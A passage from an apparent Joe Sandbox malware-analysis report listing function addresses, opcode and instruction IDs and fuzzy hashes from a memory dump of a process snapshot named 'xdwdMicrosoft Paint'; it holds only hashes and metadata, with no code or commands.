                              • Opcode ID: 6354c55780806a6e8f8fe68ee460cd0c53cce2591dfa256c73fbf2bf3b025f1a
                              • Instruction ID: cfb45cc65937ef62af24919280b434b5f160fed4f4bdcb1c09164708cc18c2dc
                              • Opcode Fuzzy Hash: 6354c55780806a6e8f8fe68ee460cd0c53cce2591dfa256c73fbf2bf3b025f1a
                              • Instruction Fuzzy Hash: 14412E71E1C94BCEEB94E7A885562BC77E1EF58300F640579D40DD3392EE2CA80587C2
                              Function 00007FFF60F21B9F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2044c8d03c74bd1a219fcee253198ddeb0190f9fe6ee7c15347687b6fab8efed
                              • Instruction ID: 9fb2dd73bc6cbc0d29593f0ae9f9e0052ee3abfcd9307973dc7c0793a60bd7e1
                              • Opcode Fuzzy Hash: 2044c8d03c74bd1a219fcee253198ddeb0190f9fe6ee7c15347687b6fab8efed
                              • Instruction Fuzzy Hash: 11419B42F1C51B46E68977F9226A1BF59E39F84302FE14838E24DD7BCFDD6DAA020251
                              Function 00007FFF60F2ACC4 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2158bb112e5acb9e5b6b79e0546ea23ec80a908f6ba05093b951b775da879d6b
                              • Instruction ID: 80a8024b8485397d1dc2eec7a04313903a52ee8234e19c7d99d94121e70373a8
                              • Opcode Fuzzy Hash: 2158bb112e5acb9e5b6b79e0546ea23ec80a908f6ba05093b951b775da879d6b
                              • Instruction Fuzzy Hash: 33416271A18D1F8FEB95EBAC84952BCB7E1FF98301B6401B9D40DD7396DE29AC428740
                              Function 00007FFF60F231F2 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 837c29025be9597c18b674d8e0242dfdc6e6817251307bb591baa5beb5ab6b5d
                              • Instruction ID: d28a5cbb8ae2cc07c2780e20b15280bc7e212ffde83490e09b0472ae48e3bbfb
                              • Opcode Fuzzy Hash: 837c29025be9597c18b674d8e0242dfdc6e6817251307bb591baa5beb5ab6b5d
                              • Instruction Fuzzy Hash: EE414B61F5C91B8BEB94E76881D56B972D3EB98312FA10434E50DC37C6DE3DAC428740
                              Function 00007FFF60F2AF8F Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 948cc4c7b808dc7a7d8ad748379b8b0d6c382c7c41d648c3f7196ad48cb9cb55
                              • Instruction ID: cf63d6e129da0058d30fc1ccf6baa9f1e561ab582c35a6aaa4d6f9dd1845d09c
                              • Opcode Fuzzy Hash: 948cc4c7b808dc7a7d8ad748379b8b0d6c382c7c41d648c3f7196ad48cb9cb55
                              • Instruction Fuzzy Hash: DD415B31A1891B8FEB95EBA8D5957FCB7E1FF58301F5404B9D80DD33A2DE2868818740
                              Function 00007FFF60F2C521 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e2fba3a8b86a88cb556cda17ad1f146be9d94953e7cf14f54ecdbb62ecfbc5f2
                              • Instruction ID: eceb8f3422c612a97a168c589d2027d01488ded83cbdefa661bd46401ba3a52d
                              • Opcode Fuzzy Hash: e2fba3a8b86a88cb556cda17ad1f146be9d94953e7cf14f54ecdbb62ecfbc5f2
                              • Instruction Fuzzy Hash: 29311931A08A1C8FDF94EB68D885BEDB7F1FB58311F10416AD40ED3252DF34A9868B41
                              Function 00007FFF60F2BED9 Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c568fc958b10805bd4d7bd42b98c08def0cacfebdae586ed69b3c3fcddc9b1d6
                              • Instruction ID: 04882e6edd0d45e901ffd71cdb87d5fe821e36c477cd0bb4bc5ac5b7b9b26651
                              • Opcode Fuzzy Hash: c568fc958b10805bd4d7bd42b98c08def0cacfebdae586ed69b3c3fcddc9b1d6
                              • Instruction Fuzzy Hash: CD315E5080E3C34FE76B92A44E252657FA0CF13301F2959FBC988CA1E3ED1D680E8762
                              Function 00007FFF60F233DE Relevance: .1, Instructions: 90COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3016b3006cc464df24da09d7446e6f7e8cdf5c5ce57f4ba71d4db094c4a442e5
                              • Instruction ID: d59f2dd6a164d7ec9745143cfc6df79f82dffadb336f1efd2f6c187beaa3398a
                              • Opcode Fuzzy Hash: 3016b3006cc464df24da09d7446e6f7e8cdf5c5ce57f4ba71d4db094c4a442e5
                              • Instruction Fuzzy Hash: D3215A65A0D3C38FE713577498A12A43FB18F53224F2A01F7D089CB5E3E91D985B8362
                              Function 00007FFF60F2C18F Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ccbfc6b55e15f5af745cb9cb9cce146066f313202227a9043a806fcf8dc29a97
                              • Instruction ID: 0cb7eaa9a2c4f5a517ca4692ba715340edc0cb3f09ba15a05f0970ed676b4123
                              • Opcode Fuzzy Hash: ccbfc6b55e15f5af745cb9cb9cce146066f313202227a9043a806fcf8dc29a97
                              • Instruction Fuzzy Hash: E5212A72D0C55BC6FBA8D5E8891A37833D0DB64311F641A3AC51DD23D2ED28E92A41D2
                              Function 00007FFF60F2B007 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb7a94580e66b764059a67b932da9529b266bcfe42bc8d6d54a381f03757bad6
                              • Instruction ID: 35078ea660ce1b3c72847f684df8b73cdbe890b95d0f667ab08fbda25393edc0
                              • Opcode Fuzzy Hash: eb7a94580e66b764059a67b932da9529b266bcfe42bc8d6d54a381f03757bad6
                              • Instruction Fuzzy Hash: 4A211D71A1881BCFEB94E7A8D5997BDB3E1FF58301F640479D90DD32A2DE2868418741
                              Function 00007FFF60F2C171 Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 599f132c9808b65a3dd77cebce6c29458c10e0dc372f89b8d040c3e9ebab9bf5
                              • Instruction ID: eca13ee275fdebdf91dffb8d7f04817aa58509c4b994495a5b1ab53b899d0c17
                              • Opcode Fuzzy Hash: 599f132c9808b65a3dd77cebce6c29458c10e0dc372f89b8d040c3e9ebab9bf5
                              • Instruction Fuzzy Hash: 94217A72D0C447C6FB6D96D88A1B2B837C0DF24311F391A3AC519C63D2ED1CE51A41D2
                              Function 00007FFF60F27D46 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 740307a3d6776c3ab728c6e8262755e4f03a4f4701354c3243dbbd5951430d66
                              • Instruction ID: 9bf1eefecedac24e4a5c33d03443762f73b3c5610724de968b5b2ee80ce896ac
                              • Opcode Fuzzy Hash: 740307a3d6776c3ab728c6e8262755e4f03a4f4701354c3243dbbd5951430d66
                              • Instruction Fuzzy Hash: CA314870518B8C8FEBA4DF28C8457E97BE1FF98710F10866AE84DC7255CB38A945CB81
                              Function 00007FFF60F29231 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: edcab04980c0a65cd30046c922d2ea688109b9be830a40bc41ebdc01caff6271
                              • Instruction ID: df01c2990fea9ed342e6113fe499e9b2840a0b8577cbe60f1053a9c6e239c147
                              • Opcode Fuzzy Hash: edcab04980c0a65cd30046c922d2ea688109b9be830a40bc41ebdc01caff6271
                              • Instruction Fuzzy Hash: 7221C522E0D646CFEB5697A8C9556A83BE0EF66320F2900B7C04DD72D2EC2C5C058352
                              Function 00007FFF60F2AF4D Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 669b29863ae5a90ac23420ebe681864729b0968ffce46a64bd0593a2e51bb242
                              • Instruction ID: 41dc6e6b1513c32f72b1e551b1b150ec714fd53ed71f5323f1f77540f34af989
                              • Opcode Fuzzy Hash: 669b29863ae5a90ac23420ebe681864729b0968ffce46a64bd0593a2e51bb242
                              • Instruction Fuzzy Hash: 2D115171A2891F8FE785FB6C845A2BCB3D1FF58301B5404B5D80DD33A2EE24AC418740
                              Function 00007FFF60F237DA Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1b1ed9020a90bd853228917ac3786612e4d604234a5ec9d7b18feafbddb176b
                              • Instruction ID: 1d8591c48999d956258256b96a356ad3f8148efe9944a22f0c502b29ed1e7242
                              • Opcode Fuzzy Hash: e1b1ed9020a90bd853228917ac3786612e4d604234a5ec9d7b18feafbddb176b
                              • Instruction Fuzzy Hash: BE018462F1D82A8AF698667C91552F863D1EB58320B5904B6D80DE7391DD1D6C814380
                              Function 00007FFF60F2927F Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0ac6a36b1fd2c84b0fde8b99e9fa567c1c8644d2b51ee98e810f95f66d4bf53
                              • Instruction ID: 1c7e9623b572b33c920e7935f7bdbf14fe97499c3d0a497340e1cd33f0bca78a
                              • Opcode Fuzzy Hash: f0ac6a36b1fd2c84b0fde8b99e9fa567c1c8644d2b51ee98e810f95f66d4bf53
                              • Instruction Fuzzy Hash: 6B012931E1C91DDEEB50EBACD5886AC77E1FB98321F250137D44DE32D0DE2898818791
                              Function 00007FFF60F2A4C1 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e8c9dc8be303261fa1efce997f6a943638eda58b3861d8c71b625c6a647fed10
                              • Instruction ID: c3790fd7657d1a0fa90a053decb0beedf90122659740832b8ef76e2767e717ad
                              • Opcode Fuzzy Hash: e8c9dc8be303261fa1efce997f6a943638eda58b3861d8c71b625c6a647fed10
                              • Instruction Fuzzy Hash: 6A01D230B1C91BCFEB94F7AC95566B973D1EF59305B640079D50DC73A2ED29A8428740
                              Function 00007FFF60F2AF47 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 34d0b730dcb8a70c7dbb9084ed86dd975aa77bd9e6db3139871d164a2fb5e070
                              • Instruction ID: 6c86c303126747bb70a76d0adf1c4ebe3546c4547c98555fa3b01eb143b2197d
                              • Opcode Fuzzy Hash: 34d0b730dcb8a70c7dbb9084ed86dd975aa77bd9e6db3139871d164a2fb5e070
                              • Instruction Fuzzy Hash: E901B121E2C90B8FE795EBAC85552FCA3E2EF48310F1400BAD80DD7396DE286C418740
                              Function 00007FFF60F216D3 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 65af5d6c259d2a3c0825e63defd87c345a35324903dddda603880980c17aa949
                              • Instruction ID: a6057462e5778d436517de970265b44d7c296c65b89be76f8f2346e46ef22f29
                              • Opcode Fuzzy Hash: 65af5d6c259d2a3c0825e63defd87c345a35324903dddda603880980c17aa949
                              • Instruction Fuzzy Hash: 67018F42D1C42786FB5072A8A5813BD76C0EFB5354F6A49B0E98DC33C2DE0D6C5502DE
                              Function 00007FFF60F21668 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7901772f2f8d215ad125f80375bb5dff267eff8b33faf76b938d27c8c9d9ee2b
                              • Instruction ID: 784eca80eade02b11439c1bd065818f58930f789b0a7b8ccf24dc7a958dd5a1c
                              • Opcode Fuzzy Hash: 7901772f2f8d215ad125f80375bb5dff267eff8b33faf76b938d27c8c9d9ee2b
                              • Instruction Fuzzy Hash: 35F09042C1E86B8AF79032E8A6552AD77C0FB753A0F6A48B0D98D972C1DD0E2C4102DD
                              Function 00007FFF60F22ABC Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b1dec074c753a6952445726ac5e64c8d4300a8dc8c558574e5a8f493a845e2f
                              • Instruction ID: c97da97edb742430a9c70165219474206fa359fe180eca12ac6a03b6abf28946
                              • Opcode Fuzzy Hash: 7b1dec074c753a6952445726ac5e64c8d4300a8dc8c558574e5a8f493a845e2f
                              • Instruction Fuzzy Hash: D1F01D20B18E0A5FDB98DB68805927866E2FB94301F904A79D01ED37C1DF79A8518640
                              Function 00007FFF60F22ADF Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 895e73479191df42f83c4289324348ab93fc142ff8db6514d4e07fbafa45702e
                              • Instruction ID: 63c0f38fd698a5725ad00d55aa7b8a6bffb30ed4d835dec7e67a4f05fd743094
                              • Opcode Fuzzy Hash: 895e73479191df42f83c4289324348ab93fc142ff8db6514d4e07fbafa45702e
                              • Instruction Fuzzy Hash: F6F06225F18A0B4FDB58AB789095169A6E3FF94301B914AB4D10EC76CBDE3CED458340
                              Function 00007FFF60F280D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: 908f87d3d271a1e10c7278215a7f68a3121787666fad4abced668331289b57e5
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 30E0ED10F1EC1F86AAA851AD6A552B912C1DBF4710FB90036D50ED27C5ED9E5C831295
                              Function 00007FFF60F280E0 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: 6d26d2fbd651ffcc343318c0533b30390f3190941407e85756797d150ef6864b
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: B7E09210F1F81B95B5A821AD2A451B932C0DB88B50F700036E80DC23C9FE8CACC34193
                              Function 00007FFF60F2C0F1 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 89e8dbffac9eb1eff1b59af88f4ba4967bc00b9933990585a574be1f57f03a31
                              • Instruction ID: 6dc0abe6d2dc26a015bdfbe92d11e1df7d4930ccb873c00fce9c8be200b17860
                              • Opcode Fuzzy Hash: 89e8dbffac9eb1eff1b59af88f4ba4967bc00b9933990585a574be1f57f03a31
                              • Instruction Fuzzy Hash: 5DE0DF3191C5664FE7012290F4C20F967D1EF9A320F6408B6E808CB7D3CC0DA5638389
                              Function 00007FFF60F2BC51 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 608119cdfa540d69113c3b165b4ea7f381f468b0c4e438ef88c69f60d5d723ab
                              • Instruction ID: a81fb34173938297ab564d6e888c0a5234da79f6ce83c0d376295001d1b44c43
                              • Opcode Fuzzy Hash: 608119cdfa540d69113c3b165b4ea7f381f468b0c4e438ef88c69f60d5d723ab
                              • Instruction Fuzzy Hash: 38E0922190C1939FE3215360E4A85F877D2EF55320F6508BBD8489BAD3DD1D65465351
                              Function 00007FFF60F23810 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61a67d3e561b5e842bf3d7b083f563944f8dd959fad18410d3aa5e2cd85897de
                              • Instruction ID: c28d51a76486fbdc99c23f3c0fb38aa11ded495dfc68898fbe5465375df56949
                              • Opcode Fuzzy Hash: 61a67d3e561b5e842bf3d7b083f563944f8dd959fad18410d3aa5e2cd85897de
                              • Instruction Fuzzy Hash: 05E06D32E2D93B8AFA98367892152F852D1EF48361F9908B7E80DD73D6ED1D9D814280
                              Function 00007FFF60F2865E Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfce73ff0b6922cae8812ab85b3f0a209c4d1cab48cb1d816fbbcb6801146ac8
                              • Instruction ID: a28314e47d0e0b86f50e30d77fdb89a5e5635f7f79f1289c1aad5d78c168ab1e
                              • Opcode Fuzzy Hash: dfce73ff0b6922cae8812ab85b3f0a209c4d1cab48cb1d816fbbcb6801146ac8
                              • Instruction Fuzzy Hash: 0BF06D20E1F9079AFB64A2E8C7991B616C1EF14345F744474D90B833C6DD9CBC428287
                              Function 00007FFF60F2C9BC Relevance: .0, Instructions: 27COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8d9831af85add99f9c3a78856b6eccd2fb754ae9585e21e72766b3df42a370d
                              • Instruction ID: fb33e3daec935a63afeadb61dae6bb70599c16aa64ef54d5b021684b84212bbd
                              • Opcode Fuzzy Hash: b8d9831af85add99f9c3a78856b6eccd2fb754ae9585e21e72766b3df42a370d
                              • Instruction Fuzzy Hash: E6E04F01B19C4B9BE685A2B840692FD57D3FFAD20176C007AD40EC3397ED589C424345
                              Function 00007FFF60F2C28A Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: 2feaf70c5292d3894e7e9b3a0eb67d5c49824a2d7104501bffea02d026b3e8c5
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 6DD0123160950DCECB4597A494053ED77A0EB45215FA0187AD10AD5181CE35C894C7C1
                              Function 00007FFF60F2888C Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f9b08a8c37c76eaf87d195de00e6564e57d654fc7b05aceafbd160e5fb98242
                              • Instruction ID: 8c22c1c4eef030d807c65ae87b93eb837aa6f5ea47b3f0877c1b01fa3fd9e487
                              • Opcode Fuzzy Hash: 0f9b08a8c37c76eaf87d195de00e6564e57d654fc7b05aceafbd160e5fb98242
                              • Instruction Fuzzy Hash: 14C0801170DC091B5640F15C549EB7D73D2D7EC171728413AD40DC3355DC34D9478342
                              Function 00007FFF60F2860C Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 10d17a231d44de07bbf44df1b9f6b86675bf093554cd162f7690a62644042ca5
                              • Instruction ID: d3608ebdb6dbe3f5e0598de8dbffb6d4381da8f715a6b81d793e9fb02882bff7
                              • Opcode Fuzzy Hash: 10d17a231d44de07bbf44df1b9f6b86675bf093554cd162f7690a62644042ca5
                              • Instruction Fuzzy Hash: EDD0123165A31689E758377966111A862C1EF45255B9404B9E90DC43A6FD2EC5C14350
                              Function 00007FFF60F2B885 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction ID: adf4ad0126fedaf94b5bbe15433207315d8566b567be6206b135e7a857037b5c
